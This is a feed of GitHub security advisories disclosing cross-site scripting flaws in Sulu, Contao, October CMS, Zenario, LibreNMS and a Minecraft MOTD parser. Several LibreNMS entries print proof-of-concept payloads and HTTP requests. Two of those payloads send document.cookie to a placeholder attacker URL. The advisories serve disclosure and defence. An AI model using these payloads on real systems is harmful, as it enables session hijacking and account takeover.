<li><a href="https://github.com/jgniecki/MinecraftMotdParser/blob/0412f68eeb91729a00444a8d6c00c45623884aa5/src/Generator/HtmlGenerator.php#L80">https://github.com/jgniecki/MinecraftMotdParser/blob/0412f68eeb91729a00444a8d6c00c45623884aa5/src/Generator/HtmlGenerator.php#L80</a><br>
Change to: <code class="notranslate">$value = sprintf($value, $this-&gt;escape($motdItem-&gt;getText()));</code></li>
</ul>
<h3>References</h3>
<ul>
<li><a title="GHSA-q898-frwq-f3qp" href="https://github.com/jgniecki/MinecraftMotdParser/security/advisories/GHSA-q898-frwq-f3qp">GHSA-q898-frwq-f3qp</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-47765" rel="nofollow">https://nvd.nist.gov/vuln/detail/CVE-2024-47765</a></li>
<li><a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/jgniecki/MinecraftMotdParser/commit/b0ab9d68a964cd3d74977f39a9e7af0a94509f7c/hovercard" href="https://github.com/jgniecki/MinecraftMotdParser/commit/b0ab9d68a964cd3d74977f39a9e7af0a94509f7c">jgniecki/MinecraftMotdParser@<tt>b0ab9d6</tt></a></li>
<li><a href="https://github.com/jgniecki/MinecraftMotdParser/blob/0412f68eeb91729a00444a8d6c00c45623884aa5/src/Generator/HtmlGenerator.php#L49">https://github.com/jgniecki/MinecraftMotdParser/blob/0412f68eeb91729a00444a8d6c00c45623884aa5/src/Generator/HtmlGenerator.php#L49</a></li>
<li><a href="https://github.com/jgniecki/MinecraftMotdParser/blob/0412f68eeb91729a00444a8d6c00c45623884aa5/src/Generator/HtmlGenerator.php#L80">https://github.com/jgniecki/MinecraftMotdParser/blob/0412f68eeb91729a00444a8d6c00c45623884aa5/src/Generator/HtmlGenerator.php#L80</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-q898-frwq-f3qp</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-q898-frwq-f3qp</guid>
<pubDate>Fri, 04 Oct 2024 18:51:35 GMT</pubDate>
</item>
<item>
<title>Injection of arbitrary HTML/JavaScript code through the media download URL</title>
<description><h3>Impact</h3>
<p>This vulnerability allows an attacker to inject arbitrary HTML/JavaScript code through the media download URL in Sulu CMS. It affects the SuluMediaBundle component. The vulnerability is a Reflected Cross-Site Scripting (XSS) issue, which could potentially allow attackers to steal sensitive information, manipulate the website's content, or perform actions on behalf of the victim.</p>
<h3>Patches</h3>
<p>The problem has not been patched yet. Users should upgrade to patched versions once they become available. Currently affected versions are:</p>
<ul>
<li>2.6.4</li>
<li>2.5.20</li>
</ul>
<h3>Workarounds</h3>
<p>Until an official patch is released, users can implement additional input validation and output encoding for the 'slug' parameter in the MediaStreamController's downloadAction method. Alternatively, configuring a Web Application Firewall (WAF) to filter potentially malicious input could serve as a temporary mitigation.</p>
<h3>References</h3>
<ul>
<li>GitHub repository: <a href="https://github.com/sulu/sulu">https://github.com/sulu/sulu</a></li>
<li>Vulnerable code: <a href="https://github.com/sulu/sulu/blob/2.6/src/Sulu/Bundle/MediaBundle/Controller/MediaStreamController.php#L106">https://github.com/sulu/sulu/blob/2.6/src/Sulu/Bundle/MediaBundle/Controller/MediaStreamController.php#L106</a></li>
</ul>
<h3>References</h3>
<ul>
<li><a title="GHSA-6784-9c82-vr85" href="https://github.com/sulu/sulu/security/advisories/GHSA-6784-9c82-vr85">GHSA-6784-9c82-vr85</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-47617" rel="nofollow">https://nvd.nist.gov/vuln/detail/CVE-2024-47617</a></li>
<li><a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/sulu/sulu/commit/a5a5ae555d282e88ff8559d38cfb46dea7939bda/hovercard" href="https://github.com/sulu/sulu/commit/a5a5ae555d282e88ff8559d38cfb46dea7939bda">sulu/sulu@<tt>a5a5ae5</tt></a></li>
<li><a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/sulu/sulu/commit/eeacd14b6cf55f710084788140d40ebb00314b29/hovercard" href="https://github.com/sulu/sulu/commit/eeacd14b6cf55f710084788140d40ebb00314b29">sulu/sulu@<tt>eeacd14</tt></a></li>
<li><a href="https://github.com/sulu/sulu/blob/2.6/src/Sulu/Bundle/MediaBundle/Controller/MediaStreamController.php#L106">https://github.com/sulu/sulu/blob/2.6/src/Sulu/Bundle/MediaBundle/Controller/MediaStreamController.php#L106</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-6784-9c82-vr85</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-6784-9c82-vr85</guid>
<pubDate>Thu, 03 Oct 2024 18:26:26 GMT</pubDate>
</item>
<item>
<title>Cross-site Scripting via uploaded SVG</title>
<description><p>Sulu v2.0.0 through v2.6.4 is vulnerable to XSS, where a low privileged user with access to the “Media” section can upload an SVG file with a malicious payload. Once uploaded and accessed, the malicious JavaScript will be executed in the victims’ (other users, including admins) browsers.</p>
<h3>References</h3>
<ul>
<li><a title="GHSA-255w-87rh-rg44" href="https://github.com/sulu/sulu/security/advisories/GHSA-255w-87rh-rg44">GHSA-255w-87rh-rg44</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-47618" rel="nofollow">https://nvd.nist.gov/vuln/detail/CVE-2024-47618</a></li>
<li><a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/sulu/sulu/commit/ca72f75eebe41ea7726624d8aea7da6c425f1eb9/hovercard" href="https://github.com/sulu/sulu/commit/ca72f75eebe41ea7726624d8aea7da6c425f1eb9">sulu/sulu@<tt>ca72f75</tt></a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-255w-87rh-rg44</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-255w-87rh-rg44</guid>
<pubDate>Thu, 03 Oct 2024 18:25:40 GMT</pubDate>
</item>
<item>
<title>Contao allows an admin account to upload SVG file containing malicious JavaScript</title>
<description><p>Contao 5.4.1 allows an authenticated admin account to upload an SVG file containing malicious JavaScript code into the target system. If the file is accessed through the website, it could lead to a Cross-Site Scripting (XSS) attack or execute arbitrary code via a crafted JavaScript on the target.</p>
<h3>References</h3>
<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-45965" rel="nofollow">https://nvd.nist.gov/vuln/detail/CVE-2024-45965</a></li>
<li><a href="https://grimthereaperteam.medium.com/contao-5-4-1-malicious-file-upload-xss-in-svg-30edb8820ecb" rel="nofollow">https://grimthereaperteam.medium.com/contao-5-4-1-malicious-file-upload-xss-in-svg-30edb8820ecb</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-mrw8-5368-phm3</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-mrw8-5368-phm3</guid>
<pubDate>Wed, 02 Oct 2024 21:30:36 GMT</pubDate>
</item>
<item>
<title>October allows an admin account to upload PDF containing malicious JavaScript</title>
<description><p>October 3.6.30 allows an authenticated admin account to upload a PDF file containing malicious JavaScript into the target system. If the file is accessed through the website, it could lead to a Cross-Site Scripting (XSS) attack or execute arbitrary code via a crafted JavaScript to the target.</p>
<h3>References</h3>
<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-45962" rel="nofollow">https://nvd.nist.gov/vuln/detail/CVE-2024-45962</a></li>
<li><a href="https://grimthereaperteam.medium.com/october-cms-3-6-30-stored-xss-ddf2be7a226e" rel="nofollow">https://grimthereaperteam.medium.com/october-cms-3-6-30-stored-xss-ddf2be7a226e</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-hxpp-g76m-qhvg</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-hxpp-g76m-qhvg</guid>
<pubDate>Wed, 02 Oct 2024 21:30:35 GMT</pubDate>
</item>
<item>
<title>Zenario allows authenticated admin users to upload PDF files containing malicious code</title>
<description><p>Zenario 9.7.61188 allows authenticated admin users to upload PDF files containing malicious code into the target system. If the PDF file is accessed through the website, it can trigger a Cross Site Scripting (XSS) attack.</p>
<h3>References</h3>
<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-45960" rel="nofollow">https://nvd.nist.gov/vuln/detail/CVE-2024-45960</a></li>
<li><a href="https://grimthereaperteam.medium.com/zenario-9-7-9-7-61188-malicious-file-upload-xss-in-pdf-eb11729fe059" rel="nofollow">https://grimthereaperteam.medium.com/zenario-9-7-9-7-61188-malicious-file-upload-xss-in-pdf-eb11729fe059</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-3636-hx62-pv26</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-3636-hx62-pv26</guid>
<pubDate>Wed, 02 Oct 2024 21:30:35 GMT</pubDate>
</item>
<item>
<title>Zenario Cross Site Scripting in the Image library</title>
<description><p>Zenario 9.7.61188 is vulnerable to Cross Site Scripting (XSS) in the Image library via the "Organizer tags" field.</p>
<h3>References</h3>
<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-45964" rel="nofollow">https://nvd.nist.gov/vuln/detail/CVE-2024-45964</a></li>
<li><a href="https://grimthereaperteam.medium.com/zenario-9-7-61188-reflect-xss-bee4ab9187e7" rel="nofollow">https://grimthereaperteam.medium.com/zenario-9-7-61188-reflect-xss-bee4ab9187e7</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-2cc5-429x-p387</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-2cc5-429x-p387</guid>
<pubDate>Wed, 02 Oct 2024 21:30:35 GMT</pubDate>
</item>
<item>
<title>LibreNMS vulnerable to Stored Cross-site Scripting via File Upload</title>
<description><h3>Summary</h3>
<p>Stored Cross-Site Scripting (XSS) can be achieved by uploading a new background for a Custom Map.</p>
<h3>Details</h3>
<p>Users with the "admin" role can set a background for a custom map; this allows the upload of an SVG file that can contain an XSS payload which will trigger on load. This leads to Stored Cross-Site Scripting (XSS).</p>
<h3>PoC</h3>
<ol>
<li>
<p>Login using an Admin role account.</p>
</li>
<li>
<p>Go over to "$URL/maps/custom", the Manage Custom Maps.<br>
<a target="_blank" rel="noopener noreferrer" href="https://github.com/user-attachments/assets/9d621532-7880-4010-b12d-efd377f0cfdd"><img src="https://github.com/user-attachments/assets/9d621532-7880-4010-b12d-efd377f0cfdd" alt="image" style="max-width: 100%;" referrerpolicy="no-referrer"></a></p>
</li>
<li>
<p>Create a new map then choose to edit it.</p>
</li>
<li>
<p>Choose the "Set Background" option.<br>
<a target="_blank" rel="noopener noreferrer" href="https://github.com/user-attachments/assets/dc2e9453-ef3e-4649-a42f-60b7a2ad8189"><img src="https://github.com/user-attachments/assets/dc2e9453-ef3e-4649-a42f-60b7a2ad8189" alt="image" style="max-width: 100%;" referrerpolicy="no-referrer"></a></p>
</li>
<li>
<p>Choose to upload an SVG file that has this content.</p>
</li>
</ol>
<div class="highlight highlight-text-xml-svg"><pre class="notranslate">&lt;<span class="pl-ent">svg</span> <span class="pl-e">xmlns</span>=<span class="pl-s"><span class="pl-pds">"</span>http://www.w3.org/2000/svg<span class="pl-pds">"</span></span> <span class="pl-e">onload</span>=<span class="pl-s"><span class="pl-pds">"</span>alert(document.domain)<span class="pl-pds">"</span></span>&gt;
&lt;<span class="pl-ent">circle</span> <span class="pl-e">cx</span>=<span class="pl-s"><span class="pl-pds">"</span>50<span class="pl-pds">"</span></span> <span class="pl-e">cy</span>=<span class="pl-s"><span class="pl-pds">"</span>50<span class="pl-pds">"</span></span> <span class="pl-e">r</span>=<span class="pl-s"><span class="pl-pds">"</span>40<span class="pl-pds">"</span></span> /&gt;
&lt;/<span class="pl-ent">svg</span>&gt;</pre></div>
<ol start="6">
<li>
<p>Once uploaded, there should be a link to the SVG returned in the POST request to the API "$URL/maps/custom/1/background".<br>
<a target="_blank" rel="noopener noreferrer" href="https://github.com/user-attachments/assets/dc224960-0bd3-42c9-ad49-2ec85b065939"><img src="https://github.com/user-attachments/assets/dc224960-0bd3-42c9-ad49-2ec85b065939" alt="image" style="max-width: 100%;" referrerpolicy="no-referrer"></a></p>
</li>
<li>
<p>Open that link in the browser; you should see a pop-up.<br>
<a target="_blank" rel="noopener noreferrer" href="https://github.com/user-attachments/assets/47a7db14-bd89-48fe-885a-fd80a052115e"><img src="https://github.com/user-attachments/assets/47a7db14-bd89-48fe-885a-fd80a052115e" alt="image" style="max-width: 100%;" referrerpolicy="no-referrer"></a></p>
</li>
</ol>
<h3>Impact</h3>
<p>An attacker can use this to execute malicious JavaScript code for malicious intent.<br>
This would impact other Admin role users and Global Read role users. Normal users do not have permission to read the file, so they are not affected.</p>
<h3>References</h3>
<ul>
<li><a title="GHSA-x8gm-j36p-fppf" href="https://github.com/librenms/librenms/security/advisories/GHSA-x8gm-j36p-fppf">GHSA-x8gm-j36p-fppf</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-47528" rel="nofollow">https://nvd.nist.gov/vuln/detail/CVE-2024-47528</a></li>
<li><a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/librenms/librenms/commit/d959bf1b366319eda16e3cd6dfda8a22beb203be/hovercard" href="https://github.com/librenms/librenms/commit/d959bf1b366319eda16e3cd6dfda8a22beb203be">librenms/librenms@<tt>d959bf1</tt></a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-x8gm-j36p-fppf</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-x8gm-j36p-fppf</guid>
<pubDate>Tue, 01 Oct 2024 22:27:32 GMT</pubDate>
</item>
<item>
<title>LibreNMS has Stored Cross-site Scripting vulnerability in "Alert Transports" feature</title>
<description><h3>Summary</h3>
<p>A Stored Cross-Site Scripting (XSS) vulnerability in the "Alert Transports" feature allows authenticated users to inject arbitrary JavaScript through the "Details" section (which contains multiple fields depending on which transport is selected at that moment). This vulnerability can lead to the execution of malicious code in the context of other users' sessions, potentially compromising their accounts and allowing unauthorized actions.</p>
<h3>Details</h3>
<p>The vulnerability occurs when creating an alert transport. The application does not properly sanitize the user input in the "Details" field, allowing an attacker to inject and store arbitrary JavaScript. This script is then executed in the context of the page whenever the alert transport is viewed or processed.</p>
<p>For instance, the following payload can be used to trigger the XSS:<br>
<code class="notranslate">test1&lt;script&gt;{onerror=alert}throw 1337&lt;/script&gt;</code></p>
<p>When the page containing the transport details is loaded, this payload causes the browser to execute the injected script, which in this case triggers an alert popup.</p>
<p>The root cause of the vulnerability is that the application does not sanitize the value of $instance-&gt;displayDetails before appending it to the HTML output. This is demonstrated in the following code:<br>
<a href="https://github.com/librenms/librenms/blob/4777247327c793ed0a3306d0464b95176008177b/includes/html/print-alert-transports.php#L40">https://github.com/librenms/librenms/blob/4777247327c793ed0a3306d0464b95176008177b/includes/html/print-alert-transports.php#L40</a></p>
<h3>PoC</h3>
<ol>
<li>Create a new alert transport in the LibreNMS interface.</li>
<li>Depending on the transport chosen, just input the following payload in any field that ends up in the "Details" section:<br>
<code class="notranslate">test1&lt;script&gt;{onerror=alert}throw 1337&lt;/script&gt;</code></li>
<li>Save the transport and trigger the alert.</li>
<li>When the transport details are accessed, the injected script executes, displaying an alert popup.</li>
</ol>
<p>Example Request:</p>
<div class="highlight highlight-source-httpspec"><pre class="notranslate"><span class="pl-k">POST</span><span class="pl-c1"> /ajax_form.php HTTP/1.1</span>
<span class="pl-s"><span class="pl-v">Host:</span> &lt;your_host&gt;</span>
<span class="pl-s"><span class="pl-v">X-Requested-With:</span> XMLHttpRequest</span>
<span class="pl-s"><span class="pl-v">X-CSRF-TOKEN:</span> &lt;your_XSRF_token&gt;</span>
<span class="pl-s"><span class="pl-v">Content-Type:</span> application/x-www-form-urlencoded; charset=UTF-8</span>
<span class="pl-s"><span class="pl-v">Cookie:</span> &lt;your_cookie&gt;</span>
<span class="pl-ii">_token=&lt;your_token&gt;&amp;transport_id=2&amp;type=alert-transports&amp;name=Test1&amp;transport-choice=canopsis-form&amp;_token=Ep6belaqXe5qE301CGmtoOWJ71gvRfBXjRyhXEpH&amp;transport-type=canopsis&amp;canopsis-host=localhost%3Cscript%3E%7Bonerror%3Dalert%7Dthrow+1337%3C%2Fscript%3E&amp;canopsis-port=5000&amp;canopsis-user=%3Cscript%3E%7Bonerror%3Dalert%7Dthrow+1337%3C%2Fscript%3E&amp;canopsis-pass=%3Cscript%3E%7Bonerror%3Dalert%7Dthrow+1337%3C%2Fscript%3E&amp;canopsis-vhost=%3Cscript%3E%7Bonerror%3Dalert%7Dthrow+1337%3C%2Fscript%3E</span></pre></div>
<h3>Impact</h3>
<p>It could allow authenticated users to execute arbitrary JavaScript code in the context of other users' sessions. Impacted users could have their accounts compromised, enabling the attacker to perform unauthorized actions on their behalf.</p>
<h3>References</h3>
<ul>
<li><a title="GHSA-7f84-28qh-9486" href="https://github.com/librenms/librenms/security/advisories/GHSA-7f84-28qh-9486">GHSA-7f84-28qh-9486</a></li>
<li><a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/librenms/librenms/commit/ee1afba003d33667981e098c83295f599d88439c/hovercard" href="https://github.com/librenms/librenms/commit/ee1afba003d33667981e098c83295f599d88439c">librenms/librenms@<tt>ee1afba</tt></a></li>
<li><a href="https://github.com/librenms/librenms/blob/4777247327c793ed0a3306d0464b95176008177b/includes/html/print-alert-transports.php#L40">https://github.com/librenms/librenms/blob/4777247327c793ed0a3306d0464b95176008177b/includes/html/print-alert-transports.php#L40</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-47523" rel="nofollow">https://nvd.nist.gov/vuln/detail/CVE-2024-47523</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-7f84-28qh-9486</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-7f84-28qh-9486</guid>
<pubDate>Tue, 01 Oct 2024 20:31:22 GMT</pubDate>
</item>
<item>
<title>LibreNMS has Stored Cross-site Scripting vulnerability in "Device Group" Name</title>
<description><h3>Summary</h3>
<p>The application fails to sanitize inputs properly and renders the code from user input in the browser, which allows an attacker to execute malicious JavaScript code.</p>
<h3>Details</h3>
<p>A user with the Admin role can create Device Groups. The application does not properly sanitize the user input in the Device Group name, so when a user views the detail of the Device Group, any JavaScript code inside the name of the Device Group will be triggered.</p>
<h3>PoC</h3>
<ol>
<li>
<p>Login as an Admin role user. Then go over to "$URL/device-groups"</p>
</li>
<li>
<p>Create a new Device Group with this payload in their name</p>
</li>
</ol>
<div class="highlight highlight-source-js"><pre class="notranslate"><span class="pl-c1">&lt;</span><span class="pl-ent">img</span> <span class="pl-c1">src</span><span class="pl-c1">=</span><span class="pl-s">"x"</span> <span class="pl-c1">onerror</span><span class="pl-c1">=</span><span class="pl-s">"alert(document.cookie)"</span><span class="pl-c1">&gt;</span></pre></div>
<p><a target="_blank" rel="noopener noreferrer" href="https://github.com/user-attachments/assets/2764b313-ee65-47e9-ab57-559d75f4575c"><img src="https://github.com/user-attachments/assets/2764b313-ee65-47e9-ab57-559d75f4575c" alt="image" style="max-width: 100%;" referrerpolicy="no-referrer"></a></p>
<ol start="3">
<li>Go over to the detail page of that Device Group, in this case "$URL/devices/group=2". You will see a pop-up.<br>
<a target="_blank" rel="noopener noreferrer" href="https://github.com/user-attachments/assets/f743ca74-5dcb-4e72-ac56-dda2b42e2986"><img src="https://github.com/user-attachments/assets/f743ca74-5dcb-4e72-ac56-dda2b42e2986" alt="image" style="max-width: 100%;" referrerpolicy="no-referrer"></a></li>
</ol>
<h3>Impact</h3>
<p>An attacker can use this to execute malicious JavaScript code for malicious intent.<br>
This would impact all users, as anyone can access the detail page of the device group.</p>
<h3>References</h3>
<ul>
<li><a title="GHSA-fc38-2254-48g7" href="https://github.com/librenms/librenms/security/advisories/GHSA-fc38-2254-48g7">GHSA-fc38-2254-48g7</a></li>
<li><a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/librenms/librenms/commit/d3b51560a8e2343e520d16e9adc72c6951aa91ee/hovercard" href="https://github.com/librenms/librenms/commit/d3b51560a8e2343e520d16e9adc72c6951aa91ee">librenms/librenms@<tt>d3b5156</tt></a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-47524" rel="nofollow">https://nvd.nist.gov/vuln/detail/CVE-2024-47524</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-fc38-2254-48g7</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-fc38-2254-48g7</guid>
<pubDate>Tue, 01 Oct 2024 20:31:17 GMT</pubDate>
</item>
<item>
<title>LibreNMS has Stored Cross-site Scripting vulnerability in "Alert Rules" feature</title>
<description><h3>Summary</h3>
<p>A Stored Cross-Site Scripting (XSS) vulnerability in the "Alert Rules" feature allows authenticated users to inject arbitrary JavaScript through the "Title" field. This vulnerability can lead to the execution of malicious code in the context of other users' sessions, potentially compromising their accounts and allowing unauthorized actions.</p>
<h3>Details</h3>
<p>The vulnerability occurs when creating an alert rule. The application does not properly sanitize user inputs in the "Title" field, which allows an attacker to escape the attribute context where the title is injected (data-content). Despite some character restrictions, the attacker can still inject a payload that leverages available attributes on the div element to execute JavaScript automatically when the page loads.</p>
<p>For example, the following payload can be used:<br>
<code class="notranslate">test1'' autofocus onfocus="document.location='https://&lt;attacker-url&gt;/logger.php?c='+document.cookie"</code></p>
<p>This payload triggers the XSS when the affected page is loaded, automatically redirecting the user to the attacker's controlled domain with any non-httponly cookies present.</p>
<p>The vulnerability stems from the application not sanitizing the value of $rule['name'] before adding it to the $enabled_msg variable. This is evident in the code:</p>
<p><a href="https://github.com/librenms/librenms/blob/9455173edce6971777cf6666d540eeeaf6201920/includes/html/print-alert-rules.php#L405">https://github.com/librenms/librenms/blob/9455173edce6971777cf6666d540eeeaf6201920/includes/html/print-alert-rules.php#L405</a></p>
<h3>PoC</h3>
<ol>
<li>Create a new alert rule in the LibreNMS interface.</li>
<li>In the "Title" field, input the following payload:<br>
<code class="notranslate">test1'' autofocus onfocus="document.location='https://&lt;attacker-url&gt;/logger.php?c='+document.cookie"</code></li>
<li>Save the rule and trigger the alert.</li>
<li>Observe that when the page loads, the injected JavaScript executes and redirects the user, sending their non-httponly cookies to the attacker's server.</li>
</ol>
<p>Example Request:</p>
<div class="highlight highlight-source-httpspec"><pre class="notranslate"><span class="pl-k">POST</span><span class="pl-c1"> /ajax_form.php HTTP/1.1</span>
<span class="pl-s"><span class="pl-v">Host:</span> &lt;your_host&gt;</span>
<span class="pl-s"><span class="pl-v">X-Requested-With:</span> XMLHttpRequest</span>
<span class="pl-s"><span class="pl-v">X-CSRF-TOKEN:</span> &lt;your_XSRF_token&gt;</span>
<span class="pl-s"><span class="pl-v">Content-Type:</span> application/x-www-form-urlencoded; charset=UTF-8</span>
<span class="pl-s"><span class="pl-v">Cookie:</span> &lt;your_cookie&gt;</span>
<span class="pl-ii">_token=&lt;your_token&gt;&amp;device_id=-1&amp;device_name=invalid+hostname&amp;rule_id=17&amp;type=alert-rules&amp;template_id=&amp;builder_json=%7B%22condition%22%3A%22AND%22%2C%22rules%22%3A%5B%7B%22id%22%3A%22access_points.accesspoint_id%22%2C%22field%22%3A%22access_points.accesspoint_id%22%2C%22type%22%3A%22string%22%2C%22input%22%3A%22text%22%2C%22operator%22%3A%22not_equal%22%2C%22value%22%3A%22test2'%5C%22%22%7D%5D%2C%22valid%22%3Atrue%7D&amp;name=test1''+autofocus+onfocus%3D%22document.location%3D'https%3A%2F%2F&lt;attacker_url&gt;%2Flogger.php%3Fc%3D'%2Bdocument.cookie%22&amp;builder_rule_0_filter=access_points.accesspoint_id&amp;builder_rule_0_operator=not_equal&amp;builder_rule_0_value_0=test2'%22&amp;severity=warning&amp;count=1&amp;delay=1m&amp;interval=5m&amp;recovery=on&amp;acknowledgement=on&amp;maps%5B%5D=1&amp;proc=&amp;notes=Test2'%22&amp;override_query=on&amp;adv_query=select+'test3'%22'%3B</span></pre></div>
<h3>Impact</h3>
<p>It could allow authenticated users to execute arbitrary JavaScript code in the context of other users' sessions. Impacted users could have their accounts compromised, enabling the attacker to perform unauthorized actions on their behalf.</p>
<h3>References</h3>
<ul>
<li><a title="GHSA-j2j9-7pr6-xqwv" href="https://github.com/librenms/librenms/security/advisories/GHSA-j2j9-7pr6-xqwv">GHSA-j2j9-7pr6-xqwv</a></li>
<li><a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/librenms/librenms/commit/7620d220e48563938d869da7689b8ac3f7721490/hovercard" href="https://github.com/librenms/librenms/commit/7620d220e48563938d869da7689b8ac3f7721490">librenms/librenms@<tt>7620d22</tt></a></li>
<li><a href="https://github.com/librenms/librenms/blob/9455173edce6971777cf6666d540eeeaf6201920/includes/html/print-alert-rules.php#L405">https://github.com/librenms/librenms/blob/9455173edce6971777cf6666d540eeeaf6201920/includes/html/print-alert-rules.php#L405</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-47525" rel="nofollow">https://nvd.nist.gov/vuln/detail/CVE-2024-47525</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-j2j9-7pr6-xqwv</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-j2j9-7pr6-xqwv</guid>
<pubDate>Tue, 01 Oct 2024 20:31:13 GMT</pubDate>
</item>
<item>
<title>LibreNMS has Stored Cross-site Scripting vulnerability in "Alert Templates" feature</title>
<description><h3>Summary</h3>
<p>A Self Cross-Site Scripting (Self-XSS) vulnerability in the "Alert Templates" feature allows users to inject arbitrary JavaScript into the alert template's name. This script executes immediately upon submission but does not persist after a page refresh.</p>
<h3>Details</h3>
<p>The vulnerability occurs when creating an alert template in the LibreNMS interface. Although the application sanitizes the "name" field when storing it in the database, this newly created template is immediately added to the table without any sanitization being applied to the name, allowing users to inject arbitrary JavaScript. This script executes when the template is created but does not persist in the database, thus preventing stored XSS.</p>
<p>For instance, the following payload can be used to exploit the vulnerability:<br>
<code class="notranslate">test1&lt;script&gt;{onerror=alert}throw 1337&lt;/script&gt;</code></p>
<p>The root cause of this vulnerability lies in the lack of sanitization of the "name" variable before it is rendered in the table. The vulnerability exists because the bootgrid function of the jQuery grid plugin does not sanitize the text being added to the table. Although tags are stripped before being added to the database (as shown in the code below), the vulnerability still allows Self-XSS during the creation of the template.</p>
<p>Where the variable is being sanitized before being stored in the database:<br>
<a href="https://github.com/librenms/librenms/blob/0e741e365aa974a74aee6b43d1b4b759158a5c7e/includes/html/forms/alert-templates.inc.php#L40">https://github.com/librenms/librenms/blob/0e741e365aa974a74aee6b43d1b4b759158a5c7e/includes/html/forms/alert-templates.inc.php#L40</a></p>
<p>Where the vulnerability is happening:<br>
<a href="https://github.com/librenms/librenms/blob/0e741e365aa974a74aee6b43d1b4b759158a5c7e/includes/html/modal/alert_template.inc.php#L205">https://github.com/librenms/librenms/blob/0e741e365aa974a74aee6b43d1b4b759158a5c7e/includes/html/modal/alert_template.inc.php#L205</a></p>
<h3>PoC</h3>
<ol>
<li>Navigate to the "Alert Templates" creation page in the LibreNMS interface.</li>
<li>In the "Name" field, input the following payload:<br>
<code class="notranslate">test1&lt;script&gt;{onerror=alert}throw 1337&lt;/script&gt;</code></li>
<li>Submit the form to create the alert template.</li>
<li>Observe that the JavaScript executes immediately, triggering an alert popup. However, this code does not persist after refreshing the page.</li>
</ol>
<h3>Impact</h3>
<p>This is a Self Cross-Site Scripting (Self-XSS) vulnerability. Although the risk is lower compared to traditional XSS, it can still be exploited through social engineering or tricking users into entering or interacting with malicious code. This can lead to unauthorized actions or data exposure in the context of the affected user's session.</p>
<h3>References</h3>
<ul>
<li><a title="GHSA-gcgp-q2jq-fw52" href="https://github.com/librenms/librenms/security/advisories/GHSA-gcgp-q2jq-fw52">GHSA-gcgp-q2jq-fw52</a></li>
<li><a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/librenms/librenms/commit/f259edc19b9f0ccca484c60b1ba70a0bfff97ef5/hovercard" href="https://github.com/librenms/librenms/commit/f259edc19b9f0ccca484c60b1ba70a0bfff97ef5">librenms/librenms@<tt>f259edc</tt></a></li>
<li><a href="https://github.com/librenms/librenms/blob/0e741e365aa974a74aee6b43d1b4b759158a5c7e/includes/html/forms/alert-templates.inc.php#L40">https://github.com/librenms/librenms/blob/0e741e365aa974a74aee6b43d1b4b759158a5c7e/includes/html/forms/alert-templates.inc.php#L40</a></li>
<li><a href="https://github.com/librenms/librenms/blob/0e741e365aa974a74aee6b43d1b4b759158a5c7e/includes/html/modal/alert_template.inc.php#L205">https://github.com/librenms/librenms/blob/0e741e365aa974a74aee6b43d1b4b759158a5c7e/includes/html/modal/alert_template.inc.php#L205</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-47526" rel="nofollow">https://nvd.nist.gov/vuln/detail/CVE-2024-47526</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-gcgp-q2jq-fw52</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-gcgp-q2jq-fw52</guid>
<pubDate>Tue, 01 Oct 2024 20:31:09 GMT</pubDate>
</item>
<item>
<title>LibreNMS has Stored Cross-site Scripting vulnerability in "Device Dependencies" feature</title>
<description><h3>Summary</h3>
<p>A Stored Cross-Site Scripting (XSS) vulnerability in the "Device Dependencies" feature allows authenticated users to inject arbitrary JavaScript through the device name ("hostname" parameter). This vulnerability can lead to the execution of malicious code in the context of other users' sessions, potentially compromising their accounts and allowing unauthorized actions.</p>
<h3>Details</h3>
<p>The vulnerability occurs when creating a device within LibreNMS. An attacker can inject arbitrary JavaScript into the hostname parameter. This malicious script is then executed when another user visits the device dependencies page, resulting in an automatic redirect to a website controlled by the attacker. This redirect can be used to steal session cookies or perform other malicious actions.</p>
<p>For example, the following payload can be used to exploit the vulnerability:<br>
<code class="notranslate">t'' autofocus onfocus="document.location='https://&lt;attacker_url&gt;/?c='+document.cookie"</code></p>
